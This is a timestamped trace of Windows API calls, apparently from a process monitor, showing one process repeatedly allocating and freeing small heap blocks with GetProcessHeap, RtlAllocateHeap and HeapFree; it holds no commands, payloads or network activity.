[0058.442] GetProcessHeap () returned 0x280000 [0058.442] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.442] GetProcessHeap () returned 0x280000 [0058.442] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.442] GetProcessHeap () returned 0x280000 [0058.442] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.442] GetProcessHeap () returned 0x280000 [0058.442] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.442] GetProcessHeap () returned 0x280000 [0058.442] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.442] GetProcessHeap () returned 0x280000 [0058.442] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.442] GetProcessHeap () returned 0x280000 [0058.442] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1dc0 [0058.442] GetProcessHeap () returned 0x280000 [0058.442] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.442] GetProcessHeap () returned 0x280000 [0058.442] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.442] GetProcessHeap () returned 0x280000 [0058.442] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1dc0 | out: hHeap=0x280000) returned 1 [0058.442] GetProcessHeap () returned 0x280000 [0058.442] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1dc0 [0058.442] GetProcessHeap () returned 0x280000 [0058.442] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.442] GetProcessHeap () returned 0x280000 [0058.442] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.442] GetProcessHeap () returned 0x280000 [0058.442] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1dc0 | out: hHeap=0x280000) returned 1 [0058.443] GetProcessHeap () returned 0x280000 [0058.443] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.443] GetProcessHeap () returned 0x280000 [0058.443] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.443] GetProcessHeap () returned 0x280000 [0058.443] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1dc0 [0058.443] GetProcessHeap () returned 0x280000 [0058.443] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.443] GetProcessHeap () returned 0x280000 [0058.443] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.443] GetProcessHeap () returned 0x280000 [0058.443] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1dc0 | out: hHeap=0x280000) returned 1 [0058.443] GetProcessHeap () returned 0x280000 [0058.443] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.443] GetProcessHeap () returned 0x280000 [0058.443] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.443] GetProcessHeap () returned 0x280000 [0058.443] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.443] GetProcessHeap () returned 0x280000 [0058.443] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.443] GetProcessHeap () returned 0x280000 [0058.443] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1dc0 [0058.443] GetProcessHeap () returned 0x280000 [0058.443] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.443] GetProcessHeap () returned 0x280000 [0058.443] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.443] GetProcessHeap () returned 0x280000 [0058.443] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1dc0 | out: hHeap=0x280000) returned 1 [0058.443] GetProcessHeap () returned 0x280000 [0058.443] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.443] GetProcessHeap () returned 0x280000 [0058.443] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.443] GetProcessHeap () returned 0x280000 [0058.443] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1dc0 [0058.443] GetProcessHeap () returned 0x280000 [0058.443] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.443] GetProcessHeap () returned 0x280000 [0058.443] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.444] GetProcessHeap () returned 0x280000 [0058.444] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1dc0 | out: hHeap=0x280000) returned 1 [0058.444] GetProcessHeap () returned 0x280000 [0058.444] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.444] GetProcessHeap () returned 0x280000 [0058.444] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.444] GetProcessHeap () returned 0x280000 [0058.444] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.444] GetProcessHeap () returned 0x280000 [0058.444] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.444] GetProcessHeap () returned 0x280000 [0058.444] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1dc0 [0058.444] GetProcessHeap () returned 0x280000 [0058.444] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.444] GetProcessHeap () returned 0x280000 [0058.444] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.444] GetProcessHeap () returned 0x280000 [0058.444] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1dc0 | out: hHeap=0x280000) returned 1 [0058.444] GetProcessHeap () returned 0x280000 [0058.444] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.444] GetProcessHeap () returned 0x280000 [0058.444] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.444] GetProcessHeap () returned 0x280000 [0058.444] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.444] GetProcessHeap () returned 0x280000 [0058.444] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.444] GetProcessHeap () returned 0x280000 [0058.444] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1dc0 [0058.444] GetProcessHeap () returned 0x280000 [0058.444] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.444] GetProcessHeap () returned 0x280000 [0058.444] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.444] GetProcessHeap () returned 0x280000 [0058.444] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1dc0 | out: hHeap=0x280000) returned 1 [0058.444] GetProcessHeap () returned 0x280000 [0058.444] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.444] GetProcessHeap () returned 0x280000 [0058.445] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.445] GetProcessHeap () returned 0x280000 [0058.445] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1dc0 [0058.445] GetProcessHeap () returned 0x280000 [0058.445] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.445] GetProcessHeap () returned 0x280000 [0058.445] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.445] GetProcessHeap () returned 0x280000 [0058.445] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1dc0 | out: hHeap=0x280000) returned 1 [0058.445] GetProcessHeap () returned 0x280000 [0058.445] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.445] GetProcessHeap () returned 0x280000 [0058.445] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.445] GetProcessHeap () returned 0x280000 [0058.445] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1dc0 [0058.445] GetProcessHeap () returned 0x280000 [0058.445] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.445] GetProcessHeap () returned 0x280000 [0058.445] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.445] GetProcessHeap () returned 0x280000 [0058.445] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1dc0 | out: hHeap=0x280000) returned 1 [0058.445] GetProcessHeap () returned 0x280000 [0058.445] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1dc0 [0058.445] GetProcessHeap () returned 0x280000 [0058.445] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.445] GetProcessHeap () returned 0x280000 [0058.445] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.445] GetProcessHeap () returned 0x280000 [0058.445] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1dc0 | out: hHeap=0x280000) returned 1 [0058.445] GetProcessHeap () returned 0x280000 [0058.445] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1dc0 [0058.445] GetProcessHeap () returned 0x280000 [0058.445] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.445] GetProcessHeap () returned 0x280000 [0058.445] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.445] GetProcessHeap () returned 0x280000 [0058.445] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1dc0 | out: hHeap=0x280000) returned 1 [0058.445] GetProcessHeap () returned 0x280000 [0058.445] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1dc0 [0058.446] GetProcessHeap () returned 0x280000 [0058.446] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.446] GetProcessHeap () returned 0x280000 [0058.446] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.446] GetProcessHeap () returned 0x280000 [0058.446] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1dc0 | out: hHeap=0x280000) returned 1 [0058.446] GetProcessHeap () returned 0x280000 [0058.446] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.446] GetProcessHeap () returned 0x280000 [0058.446] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.446] GetProcessHeap () returned 0x280000 [0058.446] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.446] GetProcessHeap () returned 0x280000 [0058.446] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.446] GetProcessHeap () returned 0x280000 [0058.446] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.446] GetProcessHeap () returned 0x280000 [0058.446] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.446] GetProcessHeap () returned 0x280000 [0058.446] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1dc0 [0058.446] GetProcessHeap () returned 0x280000 [0058.446] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.446] GetProcessHeap () returned 0x280000 [0058.446] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.446] GetProcessHeap () returned 0x280000 [0058.446] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1dc0 | out: hHeap=0x280000) returned 1 [0058.446] GetProcessHeap () returned 0x280000 [0058.446] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1dc0 [0058.446] GetProcessHeap () returned 0x280000 [0058.446] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.446] GetProcessHeap () returned 0x280000 [0058.446] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.446] GetProcessHeap () returned 0x280000 [0058.446] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1dc0 | out: hHeap=0x280000) returned 1 [0058.446] GetProcessHeap () returned 0x280000 [0058.446] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.446] GetProcessHeap () returned 0x280000 [0058.447] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.447] GetProcessHeap () returned 0x280000 [0058.447] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1dc0 [0058.447] GetProcessHeap () returned 0x280000 [0058.447] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.447] GetProcessHeap () returned 0x280000 [0058.447] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.447] GetProcessHeap () returned 0x280000 [0058.447] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1dc0 | out: hHeap=0x280000) returned 1 [0058.447] GetProcessHeap () returned 0x280000 [0058.447] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1dc0 [0058.447] GetProcessHeap () returned 0x280000 [0058.447] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.447] GetProcessHeap () returned 0x280000 [0058.447] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.447] GetProcessHeap () returned 0x280000 [0058.447] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1dc0 | out: hHeap=0x280000) returned 1 [0058.447] GetProcessHeap () returned 0x280000 [0058.447] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1dc0 [0058.447] GetProcessHeap () returned 0x280000 [0058.447] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.447] GetProcessHeap () returned 0x280000 [0058.447] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.447] GetProcessHeap () returned 0x280000 [0058.447] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1dc0 | out: hHeap=0x280000) returned 1 [0058.447] GetProcessHeap () returned 0x280000 [0058.447] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.447] GetProcessHeap () returned 0x280000 [0058.447] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.447] GetProcessHeap () returned 0x280000 [0058.447] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1dc0 [0058.447] GetProcessHeap () returned 0x280000 [0058.447] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.447] GetProcessHeap () returned 0x280000 [0058.447] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.447] GetProcessHeap () returned 0x280000 [0058.447] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1dc0 | out: hHeap=0x280000) returned 1 [0058.447] GetProcessHeap () returned 0x280000 [0058.448] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.448] GetProcessHeap () returned 0x280000 [0058.448] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.448] GetProcessHeap () returned 0x280000 [0058.448] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.448] GetProcessHeap () returned 0x280000 [0058.448] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.448] GetProcessHeap () returned 0x280000 [0058.448] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.448] GetProcessHeap () returned 0x280000 [0058.448] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.453] GetProcessHeap () returned 0x280000 [0058.453] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.061] GetProcessHeap () returned 0x280000 [0059.061] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0059.125] GetProcessHeap () returned 0x280000 [0059.126] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0059.139] GetProcessHeap () returned 0x280000 [0059.139] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0059.155] GetProcessHeap () returned 0x280000 [0059.155] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0059.155] GetProcessHeap () returned 0x280000 [0059.155] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.155] GetProcessHeap () returned 0x280000 [0059.155] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0059.155] GetProcessHeap () returned 0x280000 [0059.155] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0059.155] GetProcessHeap () returned 0x280000 [0059.155] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0059.155] GetProcessHeap () returned 0x280000 [0059.155] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0059.155] GetProcessHeap () returned 0x280000 [0059.155] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0059.155] GetProcessHeap () returned 0x280000 [0059.155] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.155] GetProcessHeap () returned 0x280000 [0059.155] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0059.155] GetProcessHeap () returned 0x280000 [0059.155] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0059.155] GetProcessHeap () returned 0x280000 [0059.155] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0059.155] GetProcessHeap () returned 0x280000 [0059.155] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.155] GetProcessHeap () returned 0x280000 [0059.155] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0059.155] GetProcessHeap () returned 0x280000 [0059.155] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0059.155] GetProcessHeap () returned 0x280000 [0059.155] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0059.155] GetProcessHeap () returned 0x280000 [0059.155] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.155] GetProcessHeap () returned 0x280000 [0059.156] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0059.156] GetProcessHeap () returned 0x280000 [0059.156] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0059.156] GetProcessHeap () returned 0x280000 [0059.156] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0059.156] GetProcessHeap () returned 0x280000 [0059.156] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.156] GetProcessHeap () returned 0x280000 [0059.156] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0059.156] GetProcessHeap () returned 0x280000 [0059.156] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0059.156] GetProcessHeap () returned 0x280000 [0059.156] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0059.156] GetProcessHeap () returned 0x280000 [0059.156] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.156] GetProcessHeap () returned 0x280000 [0059.156] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0059.156] GetProcessHeap () returned 0x280000 [0059.156] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0059.156] GetProcessHeap () returned 0x280000 [0059.156] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0059.156] GetProcessHeap () returned 0x280000 [0059.156] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.156] GetProcessHeap () returned 0x280000 [0059.156] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0059.156] GetProcessHeap () returned 0x280000 [0059.156] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0059.156] GetProcessHeap () returned 0x280000 [0059.156] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0059.156] GetProcessHeap () returned 0x280000 [0059.156] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0059.156] GetProcessHeap () returned 0x280000 [0059.156] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0059.156] GetProcessHeap () returned 0x280000 [0059.156] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0059.156] GetProcessHeap () returned 0x280000 [0059.156] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0059.156] GetProcessHeap () returned 0x280000 [0059.157] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0059.157] GetProcessHeap () returned 0x280000 [0059.157] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0059.157] GetProcessHeap () returned 0x280000 [0059.157] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0059.157] GetProcessHeap () returned 0x280000 [0059.157] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0059.157] GetProcessHeap () returned 0x280000 [0059.157] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0059.157] GetProcessHeap () returned 0x280000 [0059.157] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0059.157] GetProcessHeap () returned 0x280000 [0059.157] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0059.157] GetProcessHeap () returned 0x280000 [0059.157] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0059.157] GetProcessHeap () returned 0x280000 [0059.157] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.157] GetProcessHeap () returned 0x280000 [0059.157] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0059.157] GetProcessHeap () returned 0x280000 [0059.157] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0059.157] GetProcessHeap () returned 0x280000 [0059.157] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0059.157] GetProcessHeap () returned 0x280000 [0059.157] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.157] GetProcessHeap () returned 0x280000 [0059.157] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0059.157] GetProcessHeap () returned 0x280000 [0059.157] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0059.157] GetProcessHeap () returned 0x280000 [0059.157] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0059.157] GetProcessHeap () returned 0x280000 [0059.157] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.157] GetProcessHeap () returned 0x280000 [0059.157] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0059.157] GetProcessHeap () returned 0x280000 [0059.157] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0059.157] GetProcessHeap () returned 0x280000 [0059.158] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0059.158] GetProcessHeap () returned 0x280000 [0059.158] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.158] GetProcessHeap () returned 0x280000 [0059.158] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0059.158] GetProcessHeap () returned 0x280000 [0059.158] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0059.158] GetProcessHeap () returned 0x280000 [0059.158] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0059.158] GetProcessHeap () returned 0x280000 [0059.158] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0059.158] GetProcessHeap () returned 0x280000 [0059.158] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0059.158] GetProcessHeap () returned 0x280000 [0059.158] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0059.158] GetProcessHeap () returned 0x280000 [0059.158] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 